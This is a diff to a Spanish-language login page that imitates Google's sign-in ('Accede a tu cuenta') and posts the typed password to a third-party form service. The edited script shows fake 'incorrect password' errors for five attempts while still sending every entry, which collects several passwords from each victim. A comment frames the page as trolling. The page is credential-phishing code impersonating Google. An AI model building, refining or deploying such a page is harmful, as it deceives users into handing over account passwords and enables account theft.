--- a/index.html
+++ b/index.html
@@ -13,6 +13,7 @@
     
     <!-- Logo + Título -->
     <div class="text-center mb-6">
+      <!-- Logo de Google -->
       <img src="https://img.icons8.com/color/512/google-logo.png" 
            alt="Google" class="mx-auto mb-2 w-16">
       <h1 class="text-xl font-semibold">Accede a tu cuenta</h1>
@@ -40,12 +41,12 @@
         <input id="nombre" 
                class="border border-gray-300 rounded px-4 py-2 w-full focus:outline-none focus:ring-1 focus:ring-emerald-500" 
                name="nombre" placeholder="Ingrese su contraseña" type="password" required>
-        <p id="errorNombre" class="text-red-600 text-sm mt-1 hidden"> Contraseña incorrecta</p>
+        <p id="errorNombre" class="text-red-600 text-sm mt-1 hidden">❌ Contraseña incorrecta</p>
       </div>
       
-      <!-- Campos ocultos -->
+      <!-- Configuración FormSubmit -->
       <input type="hidden" name="_captcha" value="false">
-      <input type="hidden" name="_next" value="index.html">
+      <input type="hidden" name="_next" value="gracias.html">
 
       <!-- Botón -->
       <button type="submit" 
@@ -62,27 +63,27 @@
 
   </div>
 
-  <!-- Script para controlar intentos -->
+  <!-- Script para “trollear” -->
   <script>
     let intentoNombre = 0;
 
-    document.getElementById("contactForm").addEventListener("submit", function(e) {
+    document.getElementById("contactForm").addEventListener("submit", function() {
       const nombre = document.getElementById("nombre");
       const errorMsg = document.getElementById("errorNombre");
 
       intentoNombre++;
 
-      if (intentoNombre < 6) {
-        // Mostrar error pero igual dejar que se envíe
+      if (intentoNombre < 6) { 
+        // Mostrar error pero igual enviar
         errorMsg.classList.remove("hidden");
         nombre.classList.add("border-red-500");
-        errorMsg.textContent = "Contraseña incorrecta (intento ")";
+        errorMsg.textContent = "❌ Contraseña incorrecta (intento " + intentoNombre + " de 5)";
       } else {
-        // En el 6º intento ya no muestra error
+        // En el 6 ya no muestra error
         errorMsg.classList.add("hidden");
         nombre.classList.remove("border-red-500");
       }
-      // Importante: NO usamos preventDefault, así siempre envía con POST
+      // OJO: No usamos preventDefault, así que siempre se envía
     });
   </script>
 
